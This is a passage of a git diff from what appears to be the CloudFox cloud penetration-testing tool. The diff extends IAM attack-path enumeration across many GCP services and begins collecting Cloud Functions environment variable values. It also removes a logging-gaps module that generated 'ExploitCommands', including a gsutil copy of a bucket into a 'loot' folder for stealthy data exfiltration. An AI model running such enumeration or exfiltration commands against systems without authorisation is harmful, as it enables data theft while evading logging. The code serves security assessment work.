kmsPaths...) + + // Analyze Pub/Sub IAM policies + pubsubPaths := s.analyzePubSubIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) + paths = append(paths, pubsubPaths...) + + // Analyze Spanner IAM policies + spannerPaths := s.analyzeSpannerIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) + paths = append(paths, spannerPaths...) + + // Analyze Compute Instance IAM policies + instancePaths := s.analyzeComputeInstanceIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) + paths = append(paths, instancePaths...) + return paths, nil } @@ -831,6 +913,398 @@ func (s *AttackPathService) analyzeComputeResourceIAM(ctx context.Context, proje return paths } +// analyzeSecretManagerIAM analyzes IAM policies on Secret Manager secrets +func (s *AttackPathService) analyzeSecretManagerIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { + var paths []AttackPath + + smService, err := s.getSecretManagerService(ctx) + if err != nil { + return paths + } + + // List secrets in the project + parent := fmt.Sprintf("projects/%s", projectID) + secrets, err := smService.Projects.Secrets.List(parent).Do() + if err != nil { + return paths + } + + for _, secret := range secrets.Secrets { + // Get IAM policy for this secret + policy, err := smService.Projects.Secrets.GetIamPolicy(secret.Name).Do() + if err != nil { + continue + } + + secretName := secret.Name + // Extract just the secret name from the full path + parts := strings.Split(secret.Name, "/") + if len(parts) > 0 { + secretName = parts[len(parts)-1] + } + + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, projectID, + "resource", fmt.Sprintf("secret/%s", secretName), secretName, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + + return paths +} + +// analyzeCloudFunctionsIAM analyzes IAM policies on Cloud Functions +func (s *AttackPathService) analyzeCloudFunctionsIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { + var paths []AttackPath + + cfService, err := s.getCloudFunctionsService(ctx) + if err != nil { + return paths + } + + // List functions in the project (all locations) + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + functions, err := cfService.Projects.Locations.Functions.List(parent).Do() + if err != nil { + return paths + } + + for _, fn := range functions.Functions { + // Get IAM policy for this function + policy, err := cfService.Projects.Locations.Functions.GetIamPolicy(fn.Name).Do() + if err != nil { + continue + } + + fnName := fn.Name + // Extract just the function name from the full path + parts := strings.Split(fn.Name, "/") + if len(parts) > 0 { + fnName = parts[len(parts)-1] + } + + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, projectID, + "resource", fmt.Sprintf("function/%s", fnName), fnName, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + + return paths +} + +// analyzeCloudRunIAM analyzes IAM policies on Cloud Run services +func (s *AttackPathService) analyzeCloudRunIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { + var paths []AttackPath + + runService, err := s.getCloudRunService(ctx) + if err != nil { + return paths + } + + // List services in the project (all locations) + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + services, err := runService.Projects.Locations.Services.List(parent).Do() + if err == nil { + for _, svc := range services.Items { + // Get IAM policy for this service + policy, err := runService.Projects.Locations.Services.GetIamPolicy(svc.Metadata.Name).Do() + if err != nil { + continue + } + + svcName := svc.Metadata.Name + // Extract just the service name from the full path + parts := strings.Split(svc.Metadata.Name, "/") + if len(parts) > 0 { + svcName = parts[len(parts)-1] + } + + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, projectID, + "resource", fmt.Sprintf("run-service/%s", svcName), svcName, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + } + + return paths +} + +// analyzeKMSIAM analyzes IAM policies on KMS keys +func (s *AttackPathService) analyzeKMSIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { + var paths []AttackPath + + kmsService, err := s.getKMSService(ctx) + if err != nil { + return paths + } + + // List key rings in the project (all locations) + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + keyRings, err := kmsService.Projects.Locations.KeyRings.List(parent).Do() + if err != nil { + return paths + } + + for _, keyRing := range keyRings.KeyRings { + // List crypto keys in this key ring + keys, err := kmsService.Projects.Locations.KeyRings.CryptoKeys.List(keyRing.Name).Do() + if err != nil { + continue + } + + for _, key := range keys.CryptoKeys { + // Get IAM policy for this key + policy, err := kmsService.Projects.Locations.KeyRings.CryptoKeys.GetIamPolicy(key.Name).Do() + if err != nil { + continue + } + + keyName := key.Name + // Extract just the key name from the full path + parts := strings.Split(key.Name, "/") + if len(parts) > 0 { + keyName = parts[len(parts)-1] + } + + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, projectID, + "resource", fmt.Sprintf("kms-key/%s", keyName), keyName, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + } + + return paths +} + +// analyzePubSubIAM analyzes IAM policies on Pub/Sub topics and subscriptions +func (s *AttackPathService) analyzePubSubIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { + var paths []AttackPath + + pubsubService, err := s.getPubSubService(ctx) + if err != nil { + return paths + } + + // List topics in the project + project := fmt.Sprintf("projects/%s", projectID) + topics, err := pubsubService.Projects.Topics.List(project).Do() + if err == nil { + for _, topic := range topics.Topics { + // Get IAM policy for this topic + policy, err := pubsubService.Projects.Topics.GetIamPolicy(topic.Name).Do() + if err != nil { + continue + } + + topicName := topic.Name + // Extract just the topic name from the full path + parts := strings.Split(topic.Name, "/") + if len(parts) > 0 { + topicName = parts[len(parts)-1] + } + + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, projectID, + "resource", fmt.Sprintf("topic/%s", topicName), topicName, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + } + + // List subscriptions in the project + subscriptions, err := pubsubService.Projects.Subscriptions.List(project).Do() + if err == nil { + for _, sub := range subscriptions.Subscriptions { + // Get IAM policy for this subscription + policy, err := pubsubService.Projects.Subscriptions.GetIamPolicy(sub.Name).Do() + if err != nil { + continue + } + + subName := sub.Name + // Extract just the subscription name from the full path + parts := strings.Split(sub.Name, "/") + if len(parts) > 0 { + subName = parts[len(parts)-1] + } + + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, projectID, + "resource", fmt.Sprintf("subscription/%s", subName), subName, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + } + + return paths +} + +// analyzeSpannerIAM analyzes IAM policies on Spanner instances and databases +func (s *AttackPathService) analyzeSpannerIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { + var paths []AttackPath + + spannerService, err := s.getSpannerService(ctx) + if err != nil { + return paths + } + + // List instances in the project + parent := fmt.Sprintf("projects/%s", projectID) + instances, err := spannerService.Projects.Instances.List(parent).Do() + if err != nil { + return paths + } + + for _, instance := range instances.Instances { + // Get IAM policy for this instance + policy, err := spannerService.Projects.Instances.GetIamPolicy(instance.Name, &spanner.GetIamPolicyRequest{}).Do() + if err == nil { + instanceName := instance.Name + // Extract just the instance name from the full path + parts := strings.Split(instance.Name, "/") + if len(parts) > 0 { + instanceName = parts[len(parts)-1] + } + + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, projectID, + "resource", fmt.Sprintf("spanner-instance/%s", instanceName), instanceName, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + + // List databases in this instance + databases, err := spannerService.Projects.Instances.Databases.List(instance.Name).Do() + if err != nil { + continue + } + + for _, db := range databases.Databases { + // Get IAM policy for this database + policy, err := spannerService.Projects.Instances.Databases.GetIamPolicy(db.Name, &spanner.GetIamPolicyRequest{}).Do() + if err != nil { + continue + } + + dbName := db.Name + // Extract just the database name from the full path + parts := strings.Split(db.Name, "/") + if len(parts) > 0 { + dbName = parts[len(parts)-1] + } + + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, projectID, + "resource", fmt.Sprintf("spanner-db/%s", dbName), dbName, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + } + + return paths +} + +// analyzeComputeInstanceIAM analyzes IAM policies on Compute instances +func (s *AttackPathService) analyzeComputeInstanceIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { + var paths []AttackPath + + computeService, err := s.getComputeService(ctx) + if err != nil { + return paths + } + + // List all instances across all zones + instances, err := computeService.Instances.AggregatedList(projectID).Do() + if err != nil { + return paths + } + + for zonePath, instanceList := range instances.Items { + if instanceList.Instances == nil { + continue + } + + // Extract zone name from path (e.g., "zones/us-central1-a" -> "us-central1-a") + zone := zonePath + if strings.HasPrefix(zonePath, "zones/") { + zone = strings.TrimPrefix(zonePath, "zones/") + } + + for _, instance := range instanceList.Instances { + // Get IAM policy for this instance + policy, err := computeService.Instances.GetIamPolicy(projectID, zone, instance.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, projectID, + "resource", fmt.Sprintf("instance/%s", instance.Name), instance.Name, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + } + + return paths +} + // CombinedAttackPathAnalysis performs attack path analysis across all scopes func (s *AttackPathService) CombinedAttackPathAnalysis(ctx context.Context, projectIDs []string, projectNames map[string]string, pathType string) (*CombinedAttackPathData, error) { result := &CombinedAttackPathData{ diff --git a/gcp/services/cloudrunService/cloudrunService.go b/gcp/services/cloudrunService/cloudrunService.go index 3db15a63..ee065282 100644 --- a/gcp/services/cloudrunService/cloudrunService.go +++ b/gcp/services/cloudrunService/cloudrunService.go @@ -80,6 +80,10 @@ type ServiceInfo struct { // IAM InvokerMembers []string IsPublic bool + IAMBindings []IAMBinding // All IAM bindings on this service + + // Status + Status string // Service status } // HardcodedSecret represents a potential secret found in environment variables @@ -107,6 +111,12 @@ type SecretRefInfo struct { Type string // "env" or "volume" } +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + // JobInfo holds Cloud Run job details type JobInfo struct { Name string @@ -124,6 +134,10 @@ type JobInfo struct { MaxRetries int64 Timeout string + // VPC Access + VPCAccess string + VPCEgressSettings string + // Environment EnvVarCount int SecretEnvVarCount int @@ -136,9 +150,17 @@ type JobInfo struct { // Detailed env var and secret info EnvVars []EnvVarInfo SecretRefs []SecretRefInfo + + // IAM + IAMBindings []IAMBinding // All IAM bindings on this job + + // Status + Status string } // Services retrieves all Cloud Run services in a project across all regions +// Note: This excludes Cloud Functions 2nd gen which are deployed as Cloud Run services +// but should be enumerated via the functions module instead func (cs *CloudRunService) Services(projectID string) ([]ServiceInfo, error) { ctx := context.Background() @@ -155,12 +177,18 @@ func (cs *CloudRunService) Services(projectID string) ([]ServiceInfo, error) { call := service.Projects.Locations.Services.List(parent) err = call.Pages(ctx, func(page *run.GoogleCloudRunV2ListServicesResponse) error { for _, svc := range page.Services { + // Skip Cloud Functions 2nd gen - they have label "goog-managed-by: cloudfunctions" + // These should be enumerated via the functions module, not cloudrun + if isCloudFunction(svc.Labels) { + continue + } + info := parseServiceInfo(svc, projectID) // Try to get IAM policy iamPolicy, iamErr := cs.getServiceIAMPolicy(service, svc.Name) if iamErr == nil && iamPolicy != nil { - info.InvokerMembers, info.IsPublic = parseInvokerBindings(iamPolicy) + info.IAMBindings, info.InvokerMembers, info.IsPublic = parseAllIAMBindings(iamPolicy) } services = append(services, info) @@ -175,6 +203,19 @@ func (cs *CloudRunService) Services(projectID string) ([]ServiceInfo, error) { return services, nil } +// isCloudFunction checks if a Cloud Run service is actually a Cloud Function 2nd gen +// Cloud Functions 2nd gen are deployed as Cloud Run services but have specific labels +func isCloudFunction(labels map[string]string) bool { + if labels == nil { + return false + } + // Cloud Functions 2nd gen have "goog-managed-by: cloudfunctions" label + if managedBy, ok := labels["goog-managed-by"]; ok && managedBy == "cloudfunctions" { + return true + } + return false +} + // cloudRunRegions contains all Cloud Run regions // Note: Cloud Run Jobs API does NOT support the "-" wildcard for locations (unlike Services API) // so we need to iterate through regions explicitly @@ -229,6 +270,13 @@ func (cs *CloudRunService) Jobs(projectID string) ([]JobInfo, error) { err := call.Pages(ctx, func(page *run.GoogleCloudRunV2ListJobsResponse) error { for _, job := range page.Jobs { info := parseJobInfo(job, projectID) + + // Try to get IAM policy for job + iamPolicy, iamErr := cs.getJobIAMPolicy(service, job.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings, _, _ = parseAllIAMBindings(iamPolicy) + } + mu.Lock() jobs = append(jobs, info) mu.Unlock() @@ -268,6 +316,26 @@ func parseServiceInfo(svc *run.GoogleCloudRunV2Service, projectID string) Servic URL: svc.Uri, } + // Parse conditions for status + if len(svc.Conditions) > 0 { + for _, cond := range svc.Conditions { + if cond.Type == "Ready" { + if cond.State == "CONDITION_SUCCEEDED" { + info.Status = "Ready" + } else { + info.Status = cond.State + if cond.Reason != "" { + info.Status = cond.Reason + } + } + break + } + } + } + if info.Status == "" { + info.Status = "Unknown" + } + // Extract region from service name // Format: projects/{project}/locations/{location}/services/{name} parts := strings.Split(svc.Name, "/") @@ -414,6 +482,26 @@ func parseJobInfo(job *run.GoogleCloudRunV2Job, projectID string) JobInfo { info.Region = parts[3] } + // Parse conditions for status + if len(job.Conditions) > 0 { + for _, cond := range job.Conditions { + if cond.Type == "Ready" { + if cond.State == "CONDITION_SUCCEEDED" { + info.Status = "Ready" + } else { + info.Status = cond.State + if cond.Reason != "" { + info.Status = cond.Reason + } + } + break + } + } + } + if info.Status == "" { + info.Status = "Unknown" + } + // Last execution if job.LatestCreatedExecution != nil { info.LastExecution = job.LatestCreatedExecution.Name @@ -429,6 +517,15 @@ func parseJobInfo(job *run.GoogleCloudRunV2Job, projectID string) JobInfo { info.Timeout = job.Template.Template.Timeout info.ServiceAccount = job.Template.Template.ServiceAccount + // VPC access configuration + if job.Template.Template.VpcAccess != nil { + info.VPCAccess = job.Template.Template.VpcAccess.Connector + info.VPCEgressSettings = job.Template.Template.VpcAccess.Egress + if info.VPCAccess == "" && job.Template.Template.VpcAccess.NetworkInterfaces != nil { + info.VPCAccess = "Direct VPC" + } + } + // Container configuration if len(job.Template.Template.Containers) > 0 { container := job.Template.Template.Containers[0] @@ -506,12 +603,32 @@ func (cs *CloudRunService) getServiceIAMPolicy(service *run.Service, serviceName return policy, nil } -// parseInvokerBindings extracts who can invoke the service and checks for public access -func parseInvokerBindings(policy *run.GoogleIamV1Policy) ([]string, bool) { +// getJobIAMPolicy retrieves the IAM policy for a Cloud Run job +func (cs *CloudRunService) getJobIAMPolicy(service *run.Service, jobName string) (*run.GoogleIamV1Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.Jobs.GetIamPolicy(jobName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseAllIAMBindings extracts all IAM bindings, invokers, and checks for public access +func parseAllIAMBindings(policy *run.GoogleIamV1Policy) ([]IAMBinding, []string, bool) { + var allBindings []IAMBinding var invokers []string isPublic := false for _, binding := range policy.Bindings { + for _, member := range binding.Members { + allBindings = append(allBindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + // Check for invoker role if binding.Role == "roles/run.invoker" { invokers = append(invokers, binding.Members...) @@ -525,7 +642,7 @@ func parseInvokerBindings(policy *run.GoogleIamV1Policy) ([]string, bool) { } } - return invokers, isPublic + return allBindings, invokers, isPublic } // extractName extracts just the resource name from the full resource name diff --git a/gcp/services/functionsService/functionsService.go b/gcp/services/functionsService/functionsService.go index be9ecc10..12b8c930 100644 --- a/gcp/services/functionsService/functionsService.go +++ b/gcp/services/functionsService/functionsService.go @@ -61,7 +61,7 @@ type FunctionInfo struct { TriggerResource string TriggerRetryPolicy string // RETRY_POLICY_RETRY, RETRY_POLICY_DO_NOT_RETRY - // Environment variables (sanitized - just names, not values) + // Environment variables EnvVarCount int SecretEnvVarCount int SecretVolumeCount int @@ -70,14 +70,26 @@ type FunctionInfo struct { IAMBindings []IAMBinding // All IAM bindings for this function IsPublic bool // allUsers or allAuthenticatedUsers can invoke - // Pentest-specific fields + // Detailed env var and secret info (like Cloud Run) + EnvVars []EnvVarInfo // All environment variables with values + SecretEnvVarNames []string // Names of secret env vars + SecretVolumeNames []string // Names of secret volumes + + // Legacy fields (kept for compatibility) EnvVarNames []string // Names of env vars (may hint at secrets) - SecretEnvVarNames []string // Names of secret env vars - SecretVolumeNames []string // Names of secret volumes SourceLocation string // GCS or repo source location SourceType string // GCS, Repository } +// EnvVarInfo represents an environment variable configuration +type EnvVarInfo struct { + Name string + Value string // Direct value (may be empty if using secret ref) + Source string // "direct" or "secret-manager" + SecretName string // For Secret Manager references + SecretVersion string // Version (e.g., "latest", "1") +} + // IAMBinding represents a single IAM role binding type IAMBinding struct { Role string @@ -195,20 +207,36 @@ func parseFunctionInfo(fn *cloudfunctions.Function, projectID string) FunctionIn info.MinInstanceCount = fn.ServiceConfig.MinInstanceCount info.MaxInstanceRequestConcurrency = fn.ServiceConfig.MaxInstanceRequestConcurrency - // Extract environment variable names (pentest-relevant - may hint at secrets) + // Extract environment variables with values if fn.ServiceConfig.EnvironmentVariables != nil { info.EnvVarCount = len(fn.ServiceConfig.EnvironmentVariables) - for key := range fn.ServiceConfig.EnvironmentVariables { + for key, value := range fn.ServiceConfig.EnvironmentVariables { info.EnvVarNames = append(info.EnvVarNames, key) + info.EnvVars = append(info.EnvVars, EnvVarInfo{ + Name: key, + Value: value, + Source: "direct", + }) } } - // Extract secret environment variable names + // Extract secret environment variables if fn.ServiceConfig.SecretEnvironmentVariables != nil { info.SecretEnvVarCount = len(fn.ServiceConfig.SecretEnvironmentVariables) for _, secret := range fn.ServiceConfig.SecretEnvironmentVariables { if secret != nil { info.SecretEnvVarNames = append(info.SecretEnvVarNames, secret.Key) + // Extract version from the secret reference + version := "latest" + if secret.Version != "" { + version = secret.Version + } + info.EnvVars = append(info.EnvVars, EnvVarInfo{ + Name: secret.Key, + Source: "secret-manager", + SecretName: secret.Secret, + SecretVersion: version, + }) } } } diff --git a/gcp/services/gkeService/gkeService.go b/gcp/services/gkeService/gkeService.go index 015a7333..48208de0 100644 --- a/gcp/services/gkeService/gkeService.go +++ b/gcp/services/gkeService/gkeService.go @@ -120,6 +120,7 @@ type NodePoolInfo struct { OAuthScopes []string // Pentest-specific fields HasCloudPlatformScope bool // Full access to GCP + ScopeSummary string // Human-readable scope summary (e.g., "Full Access", "Restricted") RiskyScopes []string // Scopes that enable attacks } @@ -320,7 +321,7 @@ func parseNodePoolInfo(np *container.NodePool, clusterName, projectID, location } // Analyze OAuth scopes for risky permissions - info.HasCloudPlatformScope, info.RiskyScopes = analyzeOAuthScopes(np.Config.OauthScopes) + info.HasCloudPlatformScope, info.ScopeSummary, info.RiskyScopes = analyzeOAuthScopes(np.Config.OauthScopes) } if np.Management != nil { @@ -331,16 +332,16 @@ func parseNodePoolInfo(np *container.NodePool, clusterName, projectID, location return info } -// analyzeOAuthScopes identifies risky OAuth scopes -func analyzeOAuthScopes(scopes []string) (hasCloudPlatform bool, riskyScopes []string) { +// analyzeOAuthScopes identifies risky OAuth scopes and returns a summary +func analyzeOAuthScopes(scopes []string) (hasCloudPlatform bool, scopeSummary string, riskyScopes []string) { riskyPatterns := map[string]string{ - "https://www.googleapis.com/auth/cloud-platform": "Full GCP access", - "https://www.googleapis.com/auth/compute": "Full Compute Engine access", + "https://www.googleapis.com/auth/cloud-platform": "Full GCP access", + "https://www.googleapis.com/auth/compute": "Full Compute Engine access", "https://www.googleapis.com/auth/devstorage.full_control": "Full Cloud Storage access", "https://www.googleapis.com/auth/devstorage.read_write": "Read/write Cloud Storage", - "https://www.googleapis.com/auth/logging.admin": "Logging admin (can delete logs)", - "https://www.googleapis.com/auth/source.full_control": "Full source repo access", - "https://www.googleapis.com/auth/sqlservice.admin": "Cloud SQL admin", + "https://www.googleapis.com/auth/logging.admin": "Logging admin (can delete logs)", + "https://www.googleapis.com/auth/source.full_control": "Full source repo access", + "https://www.googleapis.com/auth/sqlservice.admin": "Cloud SQL admin", } for _, scope := range scopes { @@ -352,6 +353,21 @@ func analyzeOAuthScopes(scopes []string) (hasCloudPlatform bool, riskyScopes []s } } + // Determine scope summary + // GKE default scopes (when not explicitly set) typically include: + // - logging.write, monitoring, devstorage.read_only, service.management.readonly, servicecontrol, trace.append + if hasCloudPlatform { + scopeSummary = "Full Access" + } else if len(riskyScopes) > 0 { + // Has some risky scopes but not full access + scopeSummary = fmt.Sprintf("Broad (%d risky)", len(riskyScopes)) + } else if len(scopes) == 0 { + // Empty scopes likely means default GKE scopes (limited) + scopeSummary = "Default" + } else { + scopeSummary = "Restricted" + } + return } diff --git a/gcp/services/loggingGapsService/loggingGapsService.go b/gcp/services/loggingGapsService/loggingGapsService.go deleted file mode 100644 index 08be345e..00000000 --- a/gcp/services/loggingGapsService/loggingGapsService.go +++ /dev/null @@ -1,514 +0,0 @@ -package logginggapsservice - -import ( - "context" - "fmt" - "strings" - - logging "cloud.google.com/go/logging/apiv2" - "cloud.google.com/go/logging/apiv2/loggingpb" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "github.com/BishopFox/cloudfox/internal/gcp/sdk" - compute "google.golang.org/api/compute/v1" - container "google.golang.org/api/container/v1" - sqladmin "google.golang.org/api/sqladmin/v1beta4" - storage "google.golang.org/api/storage/v1" - "google.golang.org/api/iterator" -) - -type LoggingGapsService struct{ - session *gcpinternal.SafeSession -} - -func New() *LoggingGapsService { - return &LoggingGapsService{} -} - -func NewWithSession(session *gcpinternal.SafeSession) *LoggingGapsService { - return &LoggingGapsService{ - session: session, - } -} - -// getStorageService returns a Storage service client using cached session if available -func (s *LoggingGapsService) getStorageService(ctx context.Context) (*storage.Service, error) { - if s.session != nil { - return sdk.CachedGetStorageService(ctx, s.session) - } - return storage.NewService(ctx) -} - -// getComputeService returns a Compute service client using cached session if available -func (s *LoggingGapsService) getComputeService(ctx context.Context) (*compute.Service, error) { - if s.session != nil { - return sdk.CachedGetComputeService(ctx, s.session) - } - return compute.NewService(ctx) -} - -// getContainerService returns a Container service client using cached session if available -func (s *LoggingGapsService) getContainerService(ctx context.Context) (*container.Service, error) { - if s.session != nil { - return sdk.CachedGetContainerService(ctx, s.session) - } - return container.NewService(ctx) -} - -// getSQLAdminService returns a SQL Admin service client using cached session if available -func (s *LoggingGapsService) getSQLAdminService(ctx context.Context) (*sqladmin.Service, error) { - if s.session != nil { - return sdk.CachedGetSQLAdminServiceBeta(ctx, s.session) - } - return sqladmin.NewService(ctx) -} - -// LoggingGap represents a resource with missing or incomplete logging -type LoggingGap struct { - ResourceType string // compute, cloudsql, gke, bucket, project - ResourceName string - ProjectID string - Location string - LoggingStatus string // disabled, partial, misconfigured - MissingLogs []string // Which logs are missing - StealthValue string // HIGH, MEDIUM, LOW - value for attacker stealth - Recommendations []string - ExploitCommands []string // Commands to exploit the gap -} - -// AuditLogConfig represents the audit logging configuration for a project -type AuditLogConfig struct { - ProjectID string - DataAccessEnabled bool - AdminActivityEnabled bool // Always on, but good to verify - SystemEventEnabled bool - PolicyDeniedEnabled bool - ExemptedMembers []string - ExemptedServices []string -} - -// EnumerateLoggingGaps finds resources with logging gaps -func (s *LoggingGapsService) EnumerateLoggingGaps(projectID string) ([]LoggingGap, *AuditLogConfig, error) { - var gaps []LoggingGap - - // Get project-level audit log config - auditConfig, err := s.getProjectAuditConfig(projectID) - if err != nil { - auditConfig = &AuditLogConfig{ProjectID: projectID} - } - - // Check various resource types for logging gaps - if bucketGaps, err := s.checkBucketLogging(projectID); err == nil { - gaps = append(gaps, bucketGaps...) - } - - if computeGaps, err := s.checkComputeLogging(projectID); err == nil { - gaps = append(gaps, computeGaps...) - } - - if gkeGaps, err := s.checkGKELogging(projectID); err == nil { - gaps = append(gaps, gkeGaps...) - } - - if sqlGaps, err := s.checkCloudSQLLogging(projectID); err == nil { - gaps = append(gaps, sqlGaps...) - } - - // Check for log sinks that might be misconfigured - if sinkGaps, err := s.checkLogSinks(projectID); err == nil { - gaps = append(gaps, sinkGaps...) - } - - return gaps, auditConfig, nil -} - -func (s *LoggingGapsService) getProjectAuditConfig(projectID string) (*AuditLogConfig, error) { - ctx := context.Background() - client, err := logging.NewConfigClient(ctx) - if err != nil { - return nil, err - } - defer client.Close() - - config := &AuditLogConfig{ - ProjectID: projectID, - AdminActivityEnabled: true, // Always enabled - } - - // List log sinks to understand logging configuration - parent := fmt.Sprintf("projects/%s", projectID) - it := client.ListSinks(ctx, &loggingpb.ListSinksRequest{Parent: parent}) - - for { - sink, err := it.Next() - if err == iterator.Done { - break - } - if err != nil { - break - } - - // Check if there's a sink for audit logs - if strings.Contains(sink.Filter, "protoPayload.@type") { - config.DataAccessEnabled = true - } - } - - return config, nil -} - -func (s *LoggingGapsService) checkBucketLogging(projectID string) ([]LoggingGap, error) { - ctx := context.Background() - service, err := s.getStorageService(ctx) - if err != nil { - return nil, err - } - - var gaps []LoggingGap - - resp, err := service.Buckets.List(projectID).Do() - if err != nil { - return nil, err - } - - for _, bucket := range resp.Items { - missingLogs := []string{} - loggingStatus := "enabled" - - // Check if bucket logging is enabled - if bucket.Logging == nil || bucket.Logging.LogBucket == "" { - missingLogs = append(missingLogs, "Access logs disabled") - loggingStatus = "disabled" - } - - if len(missingLogs) > 0 { - gap := LoggingGap{ - ResourceType: "bucket", - ResourceName: bucket.Name, - ProjectID: projectID, - Location: bucket.Location, - LoggingStatus: loggingStatus, - MissingLogs: missingLogs, - StealthValue: "MEDIUM", - Recommendations: []string{ - "Enable access logging for the bucket", - fmt.Sprintf("gsutil logging set on -b gs://%s gs://%s", bucket.Name, bucket.Name), - }, - ExploitCommands: []string{ - fmt.Sprintf("# Access without logs - stealth data exfil:\ngsutil cp gs://%s/* ./loot/ 2>/dev/null", bucket.Name), - fmt.Sprintf("# List contents without being logged:\ngsutil ls -r gs://%s/", bucket.Name), - }, - } - gaps = append(gaps, gap) - } - } - - return gaps, nil -} - -func (s *LoggingGapsService) checkComputeLogging(projectID string) ([]LoggingGap, error) { - ctx := context.Background() - service, err := s.getComputeService(ctx) - if err != nil { - return nil, err - } - - var gaps []LoggingGap - - // Check VPC flow logs on subnets - req := service.Subnetworks.AggregatedList(projectID) - err = req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { - for region, subnets := range page.Items { - regionName := region - if strings.HasPrefix(region, "regions/") { - regionName = strings.TrimPrefix(region, "regions/") - } - - for _, subnet := range subnets.Subnetworks { - missingLogs := []string{} - loggingStatus := "enabled" - - // Check if VPC flow logs are enabled - if subnet.LogConfig == nil || !subnet.LogConfig.Enable { - missingLogs = append(missingLogs, "VPC Flow Logs disabled") - loggingStatus = "disabled" - } else if subnet.LogConfig.AggregationInterval != "INTERVAL_5_SEC" { - missingLogs = append(missingLogs, "VPC Flow Logs not at max granularity") - loggingStatus = "partial" - } - - if len(missingLogs) > 0 { - gap := LoggingGap{ - ResourceType: "subnet", - ResourceName: subnet.Name, - ProjectID: projectID, - Location: regionName, - LoggingStatus: loggingStatus, - MissingLogs: missingLogs, - StealthValue: "HIGH", - Recommendations: []string{ - "Enable VPC Flow Logs on subnet", - "Set aggregation interval to 5 seconds for maximum visibility", - }, - ExploitCommands: []string{ - fmt.Sprintf("# Network activity on this subnet won't be logged"), - fmt.Sprintf("# Lateral movement within VPC: %s", subnet.IpCidrRange), - }, - } - gaps = append(gaps, gap) - } - } - } - return nil - }) - - return gaps, err -} - -func (s *LoggingGapsService) checkGKELogging(projectID string) ([]LoggingGap, error) { - ctx := context.Background() - service, err := s.getContainerService(ctx) - if err != nil { - return nil, err - } - - var 